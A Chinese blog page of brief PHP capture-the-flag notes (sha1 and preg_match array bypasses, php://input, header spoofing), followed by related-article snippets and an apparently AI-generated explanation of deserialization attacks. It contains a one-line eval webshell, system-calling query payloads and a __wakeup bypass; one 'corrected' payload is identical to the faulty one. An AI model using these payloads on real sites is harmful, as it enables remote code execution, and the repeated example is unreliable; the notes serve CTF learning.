php ctf

最新推荐文章于 2024-11-09 17:13:16 发布
原创 最新推荐文章于 2024-11-09 17:13:16 发布 · 200 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#shell #windows #linux

本文探讨了PHP中的sha1函数在处理数组时的特殊情况,指出可以通过避免正则匹配直接使用数组来绕过某些检查。同时,提到了php://input用于在GET和POST请求中注入字符串的技巧,并展示了如何伪造IP地址。此外,还介绍了测试UDP端口的方法以及SQL注入的相关风险。

sha1相同的字符串

php sha1对于数组返回NULL,可以传入数组即可

var1[]=0,1
var2[]=0,2

跳过preg_match

使用数组即可跳过检查

var1[]='<?php eval($_REQUEST[5]);?>'

file_get_contents

php://input可以读入body内信息,即便使用GET请求,也是可以带body的,所以用这种方式可以在GET和POST请求中加入字符串。
在firefox中右键选择编辑并重发该网络包即可。

伪造ip

在firefox中可以编辑网络包并重新发送,在其中加入

X-Forward-For: [ip]

测试udp端口

echo "Hello World\!" | nc -4u  ip port

sql注入

phpinfo.php ctf,这你不是你所常见的PHP文件包含漏洞(利用phpinfo)
weixin_29352517的博客
03-10 1055
0x01 前言看到文件包含(+phpinfo ) 的问题,在上次众测中出现此题目,如果没打过CTF,可能真的很少见到这种问题,当然作为小白的我,也是很少遇到,毕竟都是第一次,那就来总结一波经验和操作,附赠EXP,借鉴网上大佬环境,进一步进行探索。0x02 漏洞环境执行如下命令启动环境:docker-compose up -d目标环境是官方最新版PHP7.2,说明该漏洞与PHP版本无关。环境启动后,...
2024年网络安全最新PHP CTF常见考题的绕过技巧_str_replace函数绕过(2)
2401_84265972的博客
05-03 1296
/使用1.0就可以绕过if(MD5(GET′name′])==MD5echo $flag;echo ‘?PHP在处理哈希字符串时,会利用”!=”或”==”来对哈希值进行比较,它把每一个以”0E”开头的哈希值都解释为0,所以如果两个不同的密码经过哈希以后,其哈希值都是以”0E”开头的,那么PHP将会认为他们相同,都是0。
php ctf题,CTF---PHP安全考题
weixin_28736145的博客
03-26 829
1.弱类型比较php中有两种比较的符号 == 与 ===1
PHP CTF常见考题的绕过技巧
热门推荐
m0_48108919的博客
04-07 1万+
1.===绕过 PHP比较运算符 ===在进行比较的时候,会先判断两种字符串的类型是否相等,再比较值是否相等。 只要两边字符串类型不同会返回false
ctf 图片 php_CTF-文件上传
weixin_39897758的博客
03-09 3128
CTF-文件上传写在前面:文件上传漏洞常用于获取webshell,从而取得对目标网站(系统)的控制权。要获取shell,需要: 1.知道上传后文件所保存位置(不知道那就猜、爆破) 2.上传后文件的名字(是否被更改)00一句话木马一句话木马原理及不同类型:https://baike.baidu.com/item/%E4%B8%80%E5%8F%A5%E8%AF%9D%E6%9C%A8%E9%A9%A...
CTF-WEB:PHP伪协议用法总结
weixin_59166557的博客
11-09 4097
PHP 中的一个虚拟协议(或称为流包装器),用于访问 PHP 内部流资源。它是 PHP 提供的内置流协议之一,允许你通过流(stream)方式访问 PHP 内部的数据流、文件或其他资源。与 等协议不同, 并不直接映射到文件系统,而是用于处理 PHP 特有的资源,如输入输出流、临时文件、PHP 自身的内存流等。 协议是 PHP 流包装器的一部分,允许在 PHP 脚本中灵活地处理不同类型的资源。 有多个子协议,它们提供不同的功能,常见的子协议有 、、 等。 是一个只读流,用于读取原始的 POST 数据。与
ctfphp反序列化汇总
2302_78903258的博客
07-19 2525
解题过程:首先需要找到最后的危险函数,看到了在Vox里面的include。然后想要使用include就要调用fun这个函数想要调用fun就要触发__invoke这个魔术方法__invoke() //当脚本尝试将对象调用为函数时触发作为函数就是添加了一个小括号去触发,发现在Petal类中__get方法具备这个调用函数的功能,所以需要去触发__get这个方法。
CTFPHP
SingWeek
07-26 2943
CTFPHPPHP环境及基础变量PHP漏洞函数1、sha1 和 md5 函数2、ereg()函数漏洞:00截断2、变量本身的key4、extract()变量覆盖5、strcmp()漏洞6、is_numeric()函数7、preg_match函数漏洞8、parse_str函数漏洞9、字符串比较10、unset()函数漏洞11、intval()函数漏洞12、switch()函数13、in_array()函数14、serialize() 和 unserialize()函数漏洞 PHP环境及基础 使用phpstu
CTF入门之php文件包含
qq_37410729的博客
07-23 2621
ctf-show web3,web4
php eval ctf,浅谈CTF中命令执行与绕过的小技巧
weixin_39758618的博客
03-16 1621
*本文原创作者:pupiles,本文属FreeBuf原创奖励计划,未经许可禁止转载缘起lemon师傅在安全客里发表的一篇文章,总结的很详细,学到了很多姿势。但是在此我还想画蛇添足的做一些补充及解释。补充一下命令执行的漏洞。空格绕过< 符号%09 符号需要php环境,这里就不搭建啦,见谅)$IFS$9 符号${IFS} 符号这里解释一下${IFS},$IFS,$IFS$9的区别,首先$IFS在...
CTF PHP离线chm文档
08-09
CTF PHP离线chm文档
2024年网络安全最新ctf中常见php特性_php特性 ctf
m0_54903333的博客
05-03 1109
在这个例子中,如果攻击者将恶意的PHP代码作为评论提交,如,它会被存储到数据库,并在评论显示时执行。这种远程代码执行漏洞可能导致攻击者获得应用程序的控制权,执行任意的系统命令,访问敏感数据等。24. ## 六、PHP类型强制转换:通过利用PHP的弱类型特性,攻击者可以绕过输入验证,执行非预期的操作。25. PHP类型强制转换是指通过利用PHP的弱类型特性,攻击者可以绕过输入验证,执行非预期的操作。
时间轴软件整理
zaq15csdn的博客
04-07 5714
文章目录网页在线版time.graphicstimeline.knightlabtiktoc桌面版TimelineVisioExcelPPTTimelineMaker小程序版 网页在线版 time.graphics 网站 预览我做的效果 推荐指数:???? 易用性:???????????????? 通过点击生成event,鼠标拖动调整坐标轴范围 文字插入和颜色调配傻瓜化 美观度:???????????????? 看上面预览图体会 功能...
u盘量产失败记录
zaq15csdn的博客
10-31 4029
U盘量产失败记录 看到一篇关于量产工具的[文章] (http://qikan.cqvip.com/Qikan/Article/ReadIndex?id=43482046&info=UtHPbSGfWDBdqM/apanJ+E962G6KteD5IuGCmYtedR8=) 于是尝试修理自己以前的 无法正常格式化 的U盘 查看芯片型号 USB设备ID: VID = ABCD PID = 1234 设备序列号: _ 设备供应商: Generic  设备名称: Teclast CoolFlash 设备修订
iptables进行日志记录
zaq15csdn的博客
08-09 3123
日志 iptables -N logdrop iptables -A FORWARD -i eth2 -d 27.124.18.143 -j logdrop iptables -A FORWARD -i eth2 -d 192.74.240.214 -j logdrop iptables -A logdrop -m limit --limit 5/m --limit-burst 10 -j LOG iptables -A logdrop -j DROP /sbin/service iptables save
CUDA和Compute Capability
zaq15csdn的博客
01-03 2720
Compute Capability, CUDA, GPU
vscode panel 插件开发
zaq15csdn的博客
08-07 1261
vscode panel 插件开发 先放上VS code的布局图 增加contributes 添加新的布局组件需要放入package.json的contributes下 reference文档里提及可以在activity bar和panel里增加新的组件。
linux vscode remote连接
zaq15csdn的博客
09-06 1063
Host <remotemachine> HostName <要连接的ip或者域名> User greatofdream AddressFamily inet6
windows图形化访问远程服务器
zaq15csdn的博客
06-24 1029
xrdp vnc xming http://www.straightrunning.com/XmingNotes/#head-144
报错 魔术方法 php CTF 数组 _destruct
最新发布
10-28
<think>我们正在讨论PHP CTF题目中涉及数组和魔术方法`__destruct()`报错的问题。结合引用内容,我们可以分析: 引用[1]提到`__destruct`是魔术方法,当对象销毁时被调用。引用[2]和[3]涉及CTF中的一些技巧和反序列化问题。引用[4]是关于魔术方法的背景。 通常,在CTF题目中,我们可能会遇到反序列化漏洞利用。其中,利用`__destruct`方法是一种常见手段,因为它在对象被销毁时自动调用。但是,有时使用数组和`__destruct`方法时会出现报错。 报错可能的原因: 1. 反序列化字符串格式错误:引用[3]指出,当字符串长度与反序列化描述不同时,PHP将报错。例如,反序列化字符串中指定的长度与实际字符串长度不符。 2. 魔术方法内部逻辑错误:在`__destruct`方法中,如果代码尝试访问不可访问的属性或者进行其他非法操作,也会导致报错。 3. 利用数组时构造的Payload格式问题:如引用[2]所示,在构造利用链时,如果参数传递格式不正确,可能会导致解析失败。 解决方案: 1. 检查反序列化字符串的格式是否正确,确保长度描述与字符串实际长度一致。 2. 检查`__destruct`方法内部的代码,确保不会因为访问不存在的属性或数组键而报错。如果题目允许,可以尝试覆盖`__destruct`方法(如果类可被继承)或者利用其他魔术方法。 3. 在构造数组作为Payload时,注意数组的键值对结构是否符合目标代码的解析要求。例如,引用[2]中的示例展示了如何通过精心构造参数来执行代码。 具体步骤(以反序列化漏洞为例): 假设我们有一个类: ```php class Example { public $data; public function __destruct() { // 这里假设有漏洞,比如eval($this->data); eval($this->data); } } ``` 我们构造Payload:`$object = new Example(); $object->data = "system('whoami');";` 序列化后:`O:7:"Example":1:{s:4:"data";s:17:"system('whoami');";}` 但是,如果我们在数组中使用这个对象,比如: ```php $array = array('key' => $object); $serialized = serialize($array); ``` 那么序列化后的字符串会包含数组和对象。 如果题目要求传入一个数组,并且数组中的某个元素触发`__destruct`,那么我们需要确保数组的结构正确。 报错解决: 如果遇到报错,首先检查序列化字符串的格式。例如,上面例子的数组序列化结果可能是: `a:1:{s:3:"key";O:7:"Example":1:{s:4:"data";s:17:"system('whoami');";}}` 注意:字符串的长度必须准确。比如,`s:3:"key"`中的3必须和字符串"key"的长度一致(3个字符)。 另外,引用[2]中提到的一个技巧:有时我们需要绕过某些过滤,例如将`${_GET}{a}();`这样的字符串构造出来,但要注意引号的位置和长度。 如果是因为`__destruct`方法内部访问了某个数组属性,而该属性在反序列化后没有被正确初始化,那么我们需要在构造Payload时初始化这个属性。 总结解决方案: 1. 精确控制序列化字符串中每个字段的长度,确保与实际字符串长度一致。 2. 避免在`__destruct`方法中产生错误,比如访问不存在的属性。在构造对象时,确保所有在`__destruct`方法中使用的属性都被正确赋值。 3. 如果题目有过滤,参考引用[2]中的技巧,通过参数传递来绕过。 由于没有具体的报错信息和代码,以上是常见的解决思路。 相关问题: 1. 如何构造一个PHP反序列化的Payload? 2. 在PHP反序列化中,除了`__destruct`,还有哪些魔术方法可以利用? 3. 如何避免PHP反序列化漏洞? 注意:在CTF比赛中,仔细阅读题目给出的源代码和报错信息是解决问题的关键。 </think>### PHP CTF中数组与`__destruct`魔术方法报错解决方案 在PHP CTF题目中,**数组**与`__destruct`魔术方法结合使用时出现报错,通常与**反序列化漏洞利用**相关。以下是关键问题和解决方案: --- ### 常见报错原因及解决方案 1. **反序列化字符串长度不匹配** - **问题**:PHP严格校验反序列化字符串长度(引用[3])。当`serialize()`生成的字符串长度与`unserialize()`解析时定义的长度不一致时触发报错。 - **解决方案**: - 精确计算数组元素的字符串长度: ```php // 错误示例:长度声明为3但实际4字符 $payload = 'a:1:{s:3:"key";s:4:"test";}'; // 报错! // 正确示例:长度声明与实际一致 $payload = 'a:1:{s:3:"key";s:4:"test";}'; // 修正长度声明 ``` - 使用自动化工具生成Payload(如`phpggc`)。 2. **`__destruct`中访问非法属性** - **问题**:在`__destruct()`内访问未定义属性(如数组键名不存在),触发`__get()`/`__set()`错误连锁反应(引用[1])。 - **解决方案**: - 确保反序列化后的对象属性完整初始化: ```php class VulnerableClass { public $data = []; // 显式初始化数组属性 public function __destruct() { // 安全访问:先检查键名是否存在 if(isset($this->data['key'])) { // 操作代码... } } } ``` 3. **数组结构破坏魔术方法逻辑** - **问题**:数组元素包含特殊字符(如`}`或引号)导致反序列化提前终止。 - **解决方案**: - 对数组值进行URL编码: ```php $maliciousArray = ['key' => '";}eval($_GET[cmd]);//']; $safePayload = serialize(array_map('urlencode', $maliciousArray)); ``` - 反序列化后使用`urldecode()`还原。 4. **引用传值导致的循环引用** - **问题**:数组元素引用自身对象,导致`__destruct()`无限递归。 - **解决方案**:避免循环引用: ```php $obj = new stdClass; $obj->selfRef = $obj; // 危险:循环引用 // 改为 $obj = new stdClass; $obj->safeArray = [/* 非引用数据 */]; ``` --- ### CTF实战技巧 1. **利用`__wakeup()`绕过**(引用[1]) 若目标类有`__wakeup()`,可通过修改对象属性数量绕过: ```php // 原始序列化:O:10:"TargetClass":2:{...} $payload = str_replace( 'O:10:"TargetClass":2', 'O:10:"TargetClass":3', // 增加属性数量 $serializedData ); ``` 2. **数组+`__destruct`组合利用** 构造触发`__destruct`的数组链: ```php $trigger = new VulnerableClass(); $trigger->data = ['key' => new MaliciousClass()]; // 嵌套恶意对象 $payload = serialize($trigger); ``` 3. **过滤绕过**(引用[2]) 使用变量语法`${}`绕过关键词过滤: ```url ?a=${_GET}[b]();&b=system&c=id ``` --- ### 调试建议 1. 使用`error_reporting(E_ALL)`显示所有错误细节。 2. 通过`var_dump(unserialize($payload))`验证反序列化结果。 3. 检查PHP版本差异(反序列化行为在5.6/7.x/8.x不同)。 > **关键参考**:PHP严格校验反序列化字符串长度,超出或不足均报错[^3];魔术方法`__destruct`在对象销毁时自动触发[^1];特殊语法`${}`可绕过某些过滤[^2]。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

greatofdream

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值